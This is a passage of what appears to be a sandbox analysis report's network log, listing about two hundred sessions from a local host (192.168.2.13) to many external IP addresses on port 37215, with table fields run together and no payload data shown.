                                                  14735192.168.2.134536641.232.177.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14736192.168.2.133921441.244.100.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14737192.168.2.1333166178.186.166.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14738192.168.2.1351332197.135.196.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14739192.168.2.1351062197.104.12.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14740192.168.2.1341814157.160.154.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14741192.168.2.1345116197.2.239.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14742192.168.2.1346848197.147.142.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14743192.168.2.133316441.240.76.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14744192.168.2.134651441.166.8.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14745192.168.2.133948241.136.119.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14746192.168.2.1351848197.221.178.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14747192.168.2.1359000157.102.3.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14748192.168.2.135955441.192.61.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14749192.168.2.133810219.17.4.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14750192.168.2.134340041.135.235.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14751192.168.2.135307468.176.100.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14752192.168.2.1339236220.38.109.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14753192.168.2.135302441.124.58.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14754192.168.2.1347790157.72.124.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14755192.168.2.1347222197.232.103.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14756192.168.2.134573082.114.59.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14757192.168.2.1355740157.58.12.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14758192.168.2.135625841.175.192.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14759192.168.2.1333214116.244.77.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14760192.168.2.135104441.209.190.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14761192.168.2.1337812197.205.98.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14762192.168.2.1350938157.124.105.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14763192.168.2.1337344197.1.210.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14764192.168.2.134428434.6.167.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14765192.168.2.1333708197.67.242.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14766192.168.2.1341964197.64.16.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14767192.168.2.1352080197.208.48.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14768192.168.2.134418614.236.122.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14769192.168.2.134569441.117.15.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14770192.168.2.134390641.82.57.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14771192.168.2.134925441.189.202.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14772192.168.2.134578241.44.136.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14773192.168.2.1344276197.178.205.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14774192.168.2.1353058157.225.153.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14775192.168.2.1355910197.16.235.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14776192.168.2.133483625.247.218.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14777192.168.2.1348798197.137.4.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14778192.168.2.135974641.230.122.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14779192.168.2.134860041.157.136.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14780192.168.2.1354602111.164.32.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14781192.168.2.1357122197.17.44.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14782192.168.2.1355094157.158.119.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14783192.168.2.1350162157.34.138.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14784192.168.2.135104641.71.132.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14785192.168.2.1359830157.69.9.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14786192.168.2.1354672197.107.251.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14787192.168.2.1336126157.139.247.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14788192.168.2.1353618197.104.184.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14789192.168.2.1356782157.122.225.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14790192.168.2.1344932157.78.198.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14791192.168.2.1352426157.237.56.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14792192.168.2.134080295.62.3.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14793192.168.2.1338358197.17.249.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14794192.168.2.1346222131.237.82.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14795192.168.2.135097641.138.193.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14796192.168.2.1336520197.173.11.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14797192.168.2.1353084197.141.103.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14798192.168.2.1344862157.213.87.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14799192.168.2.1348474157.61.188.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14800192.168.2.133339241.236.52.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14801192.168.2.1335332123.23.197.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14802192.168.2.1357020181.40.130.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14803192.168.2.1354370197.46.253.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14804192.168.2.1360870197.244.6.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14805192.168.2.1352784197.214.226.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14806192.168.2.1336684197.104.197.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14807192.168.2.1342440197.107.169.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14808192.168.2.1355072121.38.213.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14809192.168.2.135861246.61.177.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14810192.168.2.1341066197.184.56.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14811192.168.2.1349024157.24.64.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14812192.168.2.1357100197.162.149.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14813192.168.2.135617041.56.221.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14814192.168.2.1340556155.187.93.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14815192.168.2.1350986164.114.102.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14816192.168.2.135590478.27.137.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14817192.168.2.135902241.225.161.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14818192.168.2.1344228157.166.72.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14819192.168.2.1345840197.23.188.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14820192.168.2.135497841.188.216.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14821192.168.2.1336144197.153.212.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14822192.168.2.1355080104.247.106.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14823192.168.2.1343674186.110.49.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14824192.168.2.133578041.81.34.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14825192.168.2.133585241.206.114.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14826192.168.2.1344340197.168.220.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14827192.168.2.1342420209.166.4.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14828192.168.2.1350086157.79.9.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14829192.168.2.1338896157.20.35.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14830192.168.2.133562662.24.95.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14831192.168.2.1335728197.123.103.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14832192.168.2.1355284197.178.41.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14833192.168.2.133520441.22.28.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14834192.168.2.1343660157.206.84.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14835192.168.2.1353294197.66.144.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14836192.168.2.1352284157.167.170.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14837192.168.2.1343904157.156.97.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14838192.168.2.1336960157.96.56.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14839192.168.2.1345776157.232.162.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14840192.168.2.1335486188.152.31.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14841192.168.2.135580441.25.102.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14842192.168.2.1342306179.177.121.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14843192.168.2.136097241.173.110.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14844192.168.2.134692241.229.229.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14845192.168.2.134515841.50.77.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14846192.168.2.134461252.50.5.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14847192.168.2.1356262157.253.131.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14848192.168.2.135685041.98.153.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14849192.168.2.1359908157.117.119.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14850192.168.2.1342796157.132.54.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14851192.168.2.1356630197.73.197.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14852192.168.2.1338882157.7.92.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14853192.168.2.1334614157.179.11.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14854192.168.2.1340114157.198.120.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14855192.168.2.1345864190.139.54.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14856192.168.2.135312241.209.21.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14857192.168.2.1343156155.173.13.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14858192.168.2.135790041.142.220.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14859192.168.2.136073081.100.74.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14860192.168.2.1336714157.143.141.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14861192.168.2.1342530158.124.14.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14862192.168.2.134449641.48.94.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14863192.168.2.1354904134.17.88.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14864192.168.2.1356470157.191.100.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14865192.168.2.1342760197.98.182.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14866192.168.2.135328841.214.235.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14867192.168.2.1338272197.187.97.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14868192.168.2.1356468197.77.123.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14869192.168.2.133352636.175.147.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14870192.168.2.1349090157.33.76.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14871192.168.2.133541441.253.224.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14872192.168.2.1332836197.7.194.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14873192.168.2.1350002157.218.145.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14874192.168.2.135021041.115.236.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14875192.168.2.1339494157.0.118.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14876192.168.2.1344156211.224.193.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14877192.168.2.1343102197.165.59.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14878192.168.2.1340268108.165.246.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14879192.168.2.135206641.167.72.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14880192.168.2.1350180197.96.116.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14881192.168.2.1344156197.119.199.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14882192.168.2.1355374157.37.3.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14883192.168.2.1335312157.134.6.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14884192.168.2.1339640104.16.42.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14885192.168.2.1360120155.252.249.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14886192.168.2.1343876112.120.73.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14887192.168.2.1350306213.154.227.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14888192.168.2.133291492.192.76.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14889192.168.2.1357732157.55.20.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14890192.168.2.134934841.19.215.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14891192.168.2.1342422197.134.227.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14892192.168.2.1355062157.202.42.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14893192.168.2.134397841.93.225.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14894192.168.2.1336846197.94.70.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14895192.168.2.134895620.58.216.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14896192.168.2.1348516197.161.53.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14897192.168.2.135564441.94.5.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14898192.168.2.1351298197.147.141.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14899192.168.2.1336722157.112.67.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14900192.168.2.134435041.55.146.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14901192.168.2.1336500120.22.241.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14902192.168.2.1347276157.108.146.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14903192.168.2.1344778197.131.203.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14904192.168.2.135258887.38.80.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14905192.168.2.1357006157.101.127.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14906192.168.2.1334966197.23.134.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14907192.168.2.1349480157.88.122.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14908192.168.2.133381625.107.69.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14909192.168.2.133415632.45.254.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14910192.168.2.134483441.135.79.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14911192.168.2.1340664107.165.245.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14912192.168.2.1333244197.96.97.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14913192.168.2.135157041.166.48.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14914192.168.2.1339970197.128.153.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14915192.168.2.1345738157.119.79.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14916192.168.2.133442669.107.171.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14917192.168.2.1359626157.115.48.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14918192.168.2.1351408157.88.64.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14919192.168.2.134361070.123.108.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14920192.168.2.1339960197.0.60.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14921192.168.2.1346360197.121.244.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14922192.168.2.134678241.234.14.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14923192.168.2.135732641.82.153.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14924192.168.2.13578422.118.213.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14925192.168.2.1348052197.83.57.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14926192.168.2.1336822157.136.124.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14927192.168.2.13352385.20.61.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14928192.168.2.135020441.97.37.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14929192.168.2.1348196157.148.167.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14930192.168.2.1336952124.90.71.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14931192.168.2.1348672157.83.197.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14932192.168.2.1360704157.37.143.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14933192.168.2.1339322197.57.254.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14934192.168.2.134730441.115.120.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14935192.168.2.1342148197.221.45.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14936192.168.2.1348862157.110.183.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14937192.168.2.1342406197.160.93.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14938192.168.2.134160241.148.138.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14939192.168.2.1358944138.7.4.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14940192.168.2.1342050197.20.77.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14941192.168.2.1351066197.17.51.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14942192.168.2.1333736209.133.89.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14943192.168.2.134362688.80.29.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14944192.168.2.133649841.249.151.24037215
